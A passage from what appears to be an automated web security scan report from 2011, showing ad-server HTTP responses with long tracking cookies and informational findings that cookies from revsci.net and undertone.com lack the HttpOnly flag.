Set-Cookie: rsiPus_mnCe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bjrC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SZ7X=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_evMS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OvdF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7Fof=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zYUJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_YNkt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vvhk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J1Ps=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_b8FU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mB1L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Sjxc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_IDRv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ev9c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_X4PT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__0fe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_N0iX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D9lG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L6z4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DHsK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RWWj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5sIM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BYLc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RLoX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qW9_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tUOz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_X-Vm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_iIbq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2iyk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GmIq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DDwn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oq-t=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GGsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RHZz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bpJH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_FjqN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kTuc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1cgA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Zj0S=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__S9R=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_6dX6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ERpj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GXWN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nkS4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qHFS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gmtv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DsKn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TtGD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_34v8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ONLV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_h_EP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Z35U=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ItMH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HIOU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_j3RF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1HRX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GcFY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZM6F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Zfml=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_s5cG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mnCe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_muCF="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMwok2BjeU7ig3joPvhFn375OtJgctt+dtjkn6OQtDOR/YNpbDZrI2C86hj1VY7tYYo8RaaBaN6U+uIyenKXXMFkN8vM1Z/lS6m4eQU77IgshcEhyWoB8tlYqMk+ZaLMTRqhrDz1mb9hBP5lYZ3uEkfdbSZddTzqQ1p74J22EdoSmmfIwXv1xJAKPgMi/3Lss6bfgW1FkGxfhKSNryEthxFkWZ4wGlzvn22TldGUpR649q+aHN6SRQ9QvH2mnRBQp68ePtwwG1sHHr76HDiHZBThl81IHEXyyzgkJi7+wozAWpz8HzIMEnlhGaCdL3LR4uywGjg9tIdlQDp1mBiJNyb2k+yBLEHMmyzDpnMVAbGN+0gNaMEGLVjNU1cz7SQ3j0/sdWSI21dPY8WAGjbHt5EJswul4ERAnuOOfq8zMh9OQsmuhlfVTd3+gv184YLHu+z17HWnEXuKzJDDUUBdL4KVskNSaIRFpp+dS2ocyq1f0ng5zgZqz1NX3fUPfJYWTItxy1lrHebzT1OZFh/oB4YxO4Kx2JgHEcjha2H/zRdoVQjTegWqmu1CFoyL+f0dmWA5hhqO24oy7PeG5Uv8ZxB5D/zWErqb3n1nRiDfA3VZrXZ5m85mzTdHz6WJms4pQmyIDZuTnZJ7UJlxq+rT2fgJXh+3P1SwVxH4LJNmaxVkpegJ6bFWN7atAhFFf6sed+QkJ7TfjaHfCODhtMB4U70ydJ9HqBJIeEx2KtuTUvTrOJ1shc8yKdpE+87dBtFNeI6sjwM15I0Mo2X6/TAZ+GryBzlw3c+Vr5DQkC7ov+TcK3ciwWTftY8Kp8UfIdrdMLoJjt+0gDvSjJG99TNhr2L0ZBTYBAM9dXv6rEhLMi3xYI094cGcLAl9GJyv9lr1ZgCV41MitAAgT5H3rNzFWFdtMAJ51ZrI4MBbJbZjZzKsIptr67ah1OCz3//czOHcfTlOaxLo6LXH1vnSFEYxKRuSxsS0YzCzwHXnw8sZYkdcIckmrAl21FiwA7+hBd/7YtecEvis+kwyHyEqWHSdWL7HER1TCokY8BAnlxmztwMkkHICwLAjCnQOlEVfM15v9mMmJy0cRnXR7oNEXzzDOyiEK0viyr8i+3GN2O7T2QpYVG4vuSyjlmpQiMeDTmKH1iTHbHaor4+DdT+LmSGIL2yDZ2IqmxOrRhSuztNkSu0lQh8HbOoDmuw69+f4uDxJg59a6EcpoPxCjqJlU4PsXp7o9H3z3i1xbGuE9DCriq34NC6ELK8OBwGX0E5zA293s9chhxYCLIilejX1laxpZM"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/x9aZAxBCInYEZ/jMMNxtAxBUjF1R1o5/HgkXX/FhIvvfr+WHl5tUIizEH1qEvfY0PpxVt+Yt7nsK7nnWLbyVmnVoq+wkyqIIjotT5mhzP8D6W/yO/EWLDpnIena+gBjoZ2X5xk3FS1R2fkD1m0jLcmw3Eyq1mJmhvH4Wcdx6XoXuxNl2vZuoEDT3lQEwxZ8JblEJZfWt1tp7+PggZpQrPMNaQwXV6NwSVv/y45dn+H1VS9I2+X87boQ5mctzOOLHXMCjcC1r1UYSL8l+pU5lCEwO40F2cojUizQzC8vs5lD17nsay3T8wV95Cj1aZZeHozJtGrgi84PEvr87c2EvcrHpMXycZW5yjKsTHotVZmYnrXcMOnmIoWB4zwYRMBoh01qRCYOLnKWr0ilbhWgq3YmYIg0BQLRKaRWr6E9kEUYXOtCX8AkMEWZ/BB3ctb/0/aS1wdR3tbTGq5qcHwiXZbX+tcITF/drqn4Ohu3pPuFNjkl7hBzVpfVQsBiGHyGVAjXUoBGVFfDzXzoaA2PsJgIz9lEg7fNsgjbqvIx5Ukc5JcgM2xhhtaGYBwpXVFgRV/Xljt+yWxlUv569KS5TgelErxOgG4aXrhUP2huCfzTmlxcy9VS/n+LLYff3CoC3wllVeXF6isGPav7ROeAt7xUoX8nrQMjL8IaWj42ZwtClFb57t0+ThEZbrc5j2OQrxlDArNyoPyyqPHkQomuPXx1BFNu76/uob3zAWXCk6uvKt/hTFWKJ3TMVPLPDigzn1NeFdVUz88ARjJKLqgIQjpHOP9RnzQdp0QA469dodvjUOL7RHQQxH2X0bLie/MnwJGFNer/eDQI3bA35pCW62SiBvJSXUCHl5cUHhqzLoKJJfVZrwMzuuisVcqwPwmqZFKz5s4o7lPPntuWSCF5LOANDzcw4L2qYDyofzoHYayxYajBC03Qx3oEbuxJ1UgeNkTWWzTS2DPCv4O7nKLN7dAoJd6ODfCrYlf9UQh1FHFN67Ip/huOSwlokdliTkDW4u7GMQu3KlAt/Gd6rHoRdqCNg5gJd27+k7nz0wEiwFIjjJFz5xkWAxSyY3nPDPAF8IR1wXIXEpPdpmdhiSmzq+/PN6THNLr29fwExFY3sA9VjHrL6yboGo1ISl6QgBH+DGHcA1v6O/AjeOHPGhv7OJk9eDpe0fjIXRI7V0rr4XwqbjkcAUQgRHpd56AKFCJ7Bbmqo94f/zDaMQoYkv3eCoBIRsC4sWO9Jt8ZK/L6pt0OZjbQDMF+nvkJxiiTVvU9iRn10AUXUYrLqwLJIFYZvNdsifybhsb+/etGvwlP6dwQIG9tBNscKDO4rzJMwWEnLM7zWVPx3qUl+0fW+s+/3GaGeM77oSh3TVjKMvECHM7DrZlnYxUM9Oer8MfwxhkbYyyCYE+e7YGhTl3VAZisR0isT3ocLuw9OAZmXfi8FBouMn3xxLTiQMYe8rFQNTe1jgHq2KvHikTS7/Jwyr42GkTS9w3/UP1OQu/y4s5tIDBqzsGC5wG23JlgKlg22I22ESvFuLs1pYMpNgOhVM+LqylKzy40WaVfTxaC+K87ywrpqXk7tQPlb7EayC3UAEj0v8sDoUfeMamosvh3mryYTKLBHjjQ8ar+svv/b6qGtypmuPgDR5KSyR9ULGT7lKmBES+vs68AmuHecqLcWRvPU1BjtkUWdkAWYXMzrP3VhwhYf2Y19SFdJMBs8dVGbJYSW0gF9138D6PZIse11BYas="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://adnxs.revsci.net/imp?Z=728x90&s=1457934&r=0&_salt=65550690&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F728x90%2Fatf%3Ft%3D1308241388666%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
Content-Length: 0
Date: Thu, 16 Jun 2011 16:23:10 GMT

11.47. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_oZWc="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudNqQAOkdAaA6yg6yEdCljXybgkx/j61zQyuiToHf5iqPiyCgqe7ihtvDaMnTyr8hvk/1zvGDoKVMLvpIARTfXWibSIPnJq7tzx2HS5mSxNK9mEK0LUJBBtxfTkHhZQLIVRUl4qoS0+OQpKf0hLXuTrfH88W0K0/30f5u2F/VBLZqzXTG3ylxTAeICYpAkIDo+s6osVriy+CkZUKalTKvuvS3D2v1PFf7iTT9vE4x3PTaP+VhHgV8nk5mUMjNfRxGTZjv701p4CP71ZESA8f8DNYUWJrlBcJV+Vh/cAFvo3zS/BohFTIipdPdA6QSmXM5J8zvIBegihj3Pwn7dKs6nNdkWzB4iDLY1dHtq6IzjgHGeZfiT0SZ+Qu5CI5lXsHTPdSw7I4UrfdRY3tH2TwDhLQ9WG+A+4pN455ZIR8Pha1/dMXvt2GB6X1wTJydAE2JuxgdhKYLaFUB52dQe0tsPdUiQjV5sniqXujjXxaYn0M1u8v1Fsmap3dORXvfIOH08tqGXEVxvJLiDwpOZ0nGoaAvSE4e1qLnZfsLuszSsguE9hpOs9HVIZFS5zGLvOR0nZtjTNi4ysdnRa/H6PC3RJSHY70CL+OZtZoaB96YE28lHZVGKQWtayOMiG0wYQ+MMe1yzjc6PTo8BslL65Z0LjmOQRybrpN2LDqA1J+HIeAxOhm77/uYv8j9EjAXyXTzGSgvAvwgv+exbH1nc/EjIddHJPxoCf8ADAcHMY0iIfJalpPnZHzum2RBlrBaL3Iwj4byLzDLstaninCL0aYGwNdSBcfjQOrTj7yV5gPRFNZMNVFmNLkLzMuA7EikwTf0jqqJY6iwXQfxTP3NwhU/9anfAvJ5sjrRguvx0OIBgoAuavxfKS+uDrwM1PkcoSqJTjjANeCksaQ0w7hAdppyeDXF8N7IDthDxd5v7AdSMaw7iS2SaVd3TWFV5tpecd2XXSslgDDyMT561sh+lenweHrNMuHp9cKcL+Lzi8R0x5C38HuJbRE74Zwsua9KDq2628lPQjA7Ndbxr50nPcZS9CdLODEuwL8c6G6/af4CGX9wcfm3W+XhsiGoZCt+LpRI5qLx1gDLkLMzqnlSXytK6UzF6d5YrcYVxfE5T3+yOqsPBLQMsZRKCA9hP4RSr00b/JxDceMl9GEtPqOCp46JBdpU0gBdQQhRf4zMg575CHYHKS7kelb8hWB+Obmdbl0UbGuYP4cXmxCAro+5ZmawZ5OmKu0f55Qxe9YDdohNkAWJSUGGoUiGSp+majFrI5JXrV8xWFMjPnEZjjyLIcNIWqX/DBZQgAmPW/K1kFGCr3+zNLW32fJxJfg"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUM14ymnMBYY7dXKYa4+QBq0n9/GBbL4c0FLnOpZcOMWXfdIoqBu9CkdNxlQjRVrm76xoeXKd2rqlUsklaD7QC+F/ow1QxM58Yyl6WnV++4nDUcwbFT7BTwJlQNkxSfqk5EhERJiohDhufcOy3Id1igSTjWGWtFgOwRDxL6wisceGScbfetKK4BxmEo0Jf/6ggwMwCdr0RM7KzxbQPxF5AxyiUrBIfftgLaEmSxXt16/t7NUl3b05qIiQxcDeOS9ESfAvZ+srDdH6HKD4ns8LnSqR4r8JoZavI6/Pq+Fi2+QPndI6oUGSTSGOB6mSiq0G79yS8n9fumcLKvtCiPQ8LczowEtlpEFRKgp7YQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq85mn+ogNLpohJejQnvSINawyafJEonBB4XAvdwG2Z2uDopXs8BiqRZsbItOX89VaijRf04/hJXwgAjrujJLgwIQXJvj7hyx+xLVSb0mSWpdAywJjaNUJlttpRPXnHmwwB7WUov7tBSZT5Yw49gtvbgeR6vS/pYWO3Y9XI1eHqlL3n1CDwg8xBRWak2/69bsCjbXTbMMSJtLN0v5gBVlBeR2DD9NWA2HbvPjsqQE0fB/otaogzQgzUuJT3yFecoAfGp55+Dz27egYx8wcNR3ZBfrvhhc2NJBCXut70+WkSvjxcDPqFZ53R5JyA0JNpauWgOEmKjm++q8BX/AK7SRqNuRc9WJKdkL9Iv3EiV4xD0VpAW9b/7VUQXHUdBQCPLYrQuByi1kJICahjNh+sK7F9uFNParIk3qJosYR2M1h5gmiwt26uVxKxPCXzhSt8acviZE9e0CN7aWCwq9ajeFA8NEswRo0XRtcBY8juUWW6icPR3Taxs4hhNqKNuVaw2WfQc2FPpK6TTRYMbv/tjS2J9GxPBRtoBa2JmpjEQ2cwE5pax2GfB1WT2QdegbRFaICdC+l/vKzbHrKq0VGMBifZSmcJO4CPCjVY//F9DAa8+m3o+aWkBghpmv/ED28I488TH7FzcWJHXuvpbQs6qk0sGGCL2Qm2G7jocOOpBHUBUB2HhPc31J7OThksnfG6M3RiPtJLoOhujeBo90PvjAr74jA4OKswU78Y6NYg7EcLq6OnwPK5vKF6abTG9owpzKUW/j269fn6YrnC4jrPKmgAPD7xe5mP2s8DrgSslVqcKp3A/fzuvGlhpfGcdRJPWN3Gv12fbqeEbeEqLEuf0acfDwsvlIGLcdlSB42a0qq6KcWgGwPOyloB/WNS8SdcRwMDSxIvB/Rn4VuyOEXxnTk+50FTr1kui3jEbyG99/fl2p572qawJyun7m6BhaM5l58xi77SYrHpZRWma0mGe+q+5cJtwfk+82IV+EAJjWKra7kb4Np0D5lRxYfgVNHrc+c/ol5kF1JRAbRKCkgsiz/hPmNLXjBCpqJlxzpRX/YD2t6dy/pNmwpRuYe2mJJNNCOhCYBkOgkgXE/v8r87yn4iyDPmrwAyBNBjBIFHNkushw1OZFGwrFt0P+P7GxnXOiL+Lr3oEoXw0fS4GxCoxayOYwcOgK+mxU29fbMVVZPfse3Nnnel4Pe/OZ7ZPiCGWcLUzVtzy8J6tNZkg0CrA7ruA+yoF90dhNtv2/cKZm1BB7Z0gM2OdC6ziJzCp89IqUuqM386mYoIPecSyIgffoLHIUyLbnrr0XG5lcqVU9+Fij6V+DDyNownTsAUJbfrpG2id1H5DgbX2xPi191FIDKQ4pjg62D+R0v5EBMdQT6GQwRucssggWnTOsHXwH76xw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.48. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_LiL_="MLsXtSMNJyhvJZH0ecXcxPALrEtuUCF+UoWp6s1T5naB64mAw0+Om2ozfWioJheIF3IkbvZ3v3iLzJfcG1pQiflLT+1J0P6gVOnYI8tiB0L0DUjfn+ch8yRYmr2CSQa7wV1rwwrk5N5cv11he3i2tXf6DX3mabgD0dPF6VBIU9ze35f1g6DBs57Y1bM/Rqbb8btJJSmdLuodbAJaDccRzm4RDVe+yUa2+DiAxPgSsK1GOBwVrDpy8kuGVRvL6RIcjNdBuxlCRbm3Imr7Rq9Goy6WfiYkvyumzmOI5mEaQbZHgK/V1WX36ZoIptD6XnaIbDuu0i7CRXvRhcU4e7pSbxVBxOUkv+UXlYAEXPZQhP0+7yU2hyRUCY6uAixIuI0KvNAjrXmHt/49ab30EGfTUNq4KHNnyyyW3MH2LXZ3DW1p6ctDyPZMLe2hC5PtNK6BOuIOvh9r+klRtNWRI+uAATizgI43amBW8hViYzlqBaKHyRG9/89iY73Lzgq+nYBpo+fnDGPF6/dsHJenDSrtrIUAuL95pWE2/nrmDbSMCrywWqPGdlQR94TVsvELKVha8KaG5XgRB4SeKT7IcArw7LXu7/fTNi/bSmAvXKwRe5hfHa7v60buJ2SywubklLXeJ+QEgQrw/tGdgKsshSBN8v9onjc03oDZMoMlR2JSaxSwIFKfQU+dxZ/2DE7IIBuDwct6rkkRRs25o8Yslhq+rT2fgJWZ+3P1qwRxH43pBmaxsFJ9XLMRcZgJGMg47f6tmcS3+eJitBJYe1SYG8d3ssjerqPqIY2QxbOauuZuWN0d3D0qHYC79RGbhnpHEL019kmJCZaTqz97BsUlOEIGtdRBnry1bToYjuAKIug5FApia87UtHyk6UXmRAy5u0Drxwmuw0vD9o4yCGJDpDaxNrajTEbfVhJ8yCJ/iGQsHATY30FCrTJXXJffsCg4VdwiD2psS2TWou53sRPGQJVe+7k0LqnWVcpVVzXAcgbGMGTScFEpelxie6i5FRA4KJKfvc27o4UUT3Z/jnT7z9kKYKTmTWQQ8GwLwMfRXnwATsC9JcGmvHKrjfEl+1auNzhzzYW5a/w6tZZOZCCHrXwe7tiHkeFc2k/NEApc3Y2B9PFhSvUaR7kCb6TQfkZJNoZkh5Cldc00b1lpP2RTmerFRqNFCirRQMq38i83GNWOk8wQCoz+pity1Up6D0tIeTRmFH1iTHZ7NsW+w0DzLoC0qoGXStoPcwUjVLG5LXdQBO7QeX5INgvps9cS1bzQD9GYOpqlSueX4YK3Pc2z3wAs0T4jRx37VsqmMDvtA3prRZ7PJwTdTxZTe2xk7yQyXnBTM5oQ/IpF7bHSiwuZN7AE5R8="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NG/UTjJLypNPMu8j89fR48RnmECgKBWcP4HFOlhpV00nK/FOK7z+f1xdhwSIkT3DoXXrrgh3QjEwqdbVOUyQ1goAkAM4fvzRfWqdx53NjkHy5/7RHsmlLp6hyaqT427B/NL2MKYvFzk0ks3XZ+YYg32pjldWJXlRSttU1h3h9PAapjJW1UbsXnMK+8Dhb6DLu5iBq6oG41IZqUXDfdUInNnM88F7wL4iZiCreeyZL9ptxFPXuO5bNXKn7p4yvHazjOwwXpr2Srm6ydt+qXIJ5H7iNtlkTqE5r7kU5vwuYmm4epiLtLfOp+jJnsCnWXbsCynT7FgzE7GiBMpT/Yq2qs3VXCbrLRrs0AfyIlMYM1ytw5JoU0H1pKUlphxcLhmuOEr5MMJ5H000rSLsUn2FdHFbdWpFH8zatF00IohdmpslD3qcBobpD6JleEyUVy1RQ7GK/gAEYRViuseoPgkklzXw+Gu0eI+pek2JknCtWtMi1qWAqhdaJo+cboMZdV7rfd6A6QeJXsAiTADRfz9bTn0FWF/jMkLvNmhQSdPUYR5F/XPggT9vjQr67tO4Al/NQXfZ2kLbOpYL6lTS321CAsMkTQukduzc6GeCrANU9LISG2hKpCJfChlUYeqchZYUxp1Db0hGfT9VeHhWPvw5ZXaucFNAwYHP4Mi62YhKAFwKcNBXJTLdxChBJeIwrD70BBalQqKuPw59wlLMbuA5iGTlHyNpN3ID35wwsFw4Wlaz5CqV5iuCoSlk90KBQchxZXqT5wchoq7Reu+fUhbtkaxc0h5K8uIiXeXoen1GHuiITAAsohqJbyeAry4u2IwIensLcyktqs7Sh8H8oDg2m9PmXc6j9DdOae6l0wQZsIoMfp4eTN37ajU0mKv/jAAQNHDnA1LY6xlSBOziWy2ri6kSWQwaVMhh6u/JG81mi35R+UAbl3wsC1C9koQ3IKq0VGPBqfJdMSyrIrV/Gs+QZN9DAa9WlgHctmg3QGJGSmWVI88VCrIRm8zOG0aCjJ+G/CtLBRR2SCL2Qu2G5joYv7S0NQ/PbYGZj8H1F7PThoFktpAyKxmYOUiNidijH7NmwZrvYkwdgwyVP/eZooAAijNhuHJbyzffFypfSEMKSvR5bLpXKHcOeRyC0H6+3m4khQWoqJS5vF+mEVoeGJ2MSSVsAbGWROnuA+hnyG8Pzo1R0qr0XN/B+6B/NAkex3gYlWLQq4mWSCB7KHVKrgBqpuS/+yrnyTNvt/LnHsbkDQc3nfj5gpojxtWqtGaxK6HlGt1xn+TYqv6ysEBj2ZNmENFasNin6OlMNN7EyK4gVhuhY9LcuxtFk+HS1I00VGVpptg9BUvA5fZTgYPrLYygsTV0LVzEwy++xqwwojOpVYl+Ldj3i/qpbZAT1iNVPwu2DJ9Nd/rAVMSxUQ0eYAk7nR/R9H9myEBJgzxdRtxFRolf3JTCZSgIudcAm5wMEysXbNPuLAElHn1ReyHXlnjZTMA6XMmergjHuJ7hPO8x+pLvJ/wgM31/uQRMhMJ1TkCmBSY50PKtdAw9hWbUVwQoJGsikvwbPESmh3zKkHgZ7xHMtB/5uIiNF32GB/3PNuO3pFYM7Rq9Vwys3aen9Nk6ifIj2BWLywWJI9yOymM36+s66eR9eiXMF8PnNlCzsTTFAF5d1od8ZZ5sLo98tD863rScZQu8FU7bvWKon8L3rpFplKqLUqLfiLMB76TlD26LxoPefYCsiuamOqG7lTmmWBaAKEGRK1eWjmyHqg7lzDiA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.49. http://ads.undertone.com/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/ajs.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; expires=Thu, 14-Jul-2011 12:07:42 GMT; path=/; domain=.undertone.com
UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 12:07:42 GMT; path=/
UTLIA=209452.llcw5o-14493_209454.llcw5n-13753_215465.lmvt2w-12268_215480.lmvt1e-12268_205196.lljpij-4837; expires=Sat, 16-Jul-2011 12:07:42 GMT; path=/
UTPROFILES=15141%239%3A1%2C3%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7%7C1022%3A31_28%2C7_27%2C34_1%2C2%7C1023%3A31_28%2C7_27%2C35_1%2C2%7C1146%3A1%7C1147%3A1%7C1153%3A1%7C1158%3A1%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%7C2878%3A1%7C2881%3A1%7C2882%3A1%2C2%7C2894%3A1%7C2897%3A1%7C2898%3A1%2C2%7C2900%3A1%2C2%7C2901%3A1%2C2%7C2903%3A1%2C2%7C2909%3A1%7C2917%3A1%7C2918%3A1%7C2922%3A1%2C2%7C2924%3A1%2C2%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4; expires=Wed, 14-Sep-2011 12:07:42 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

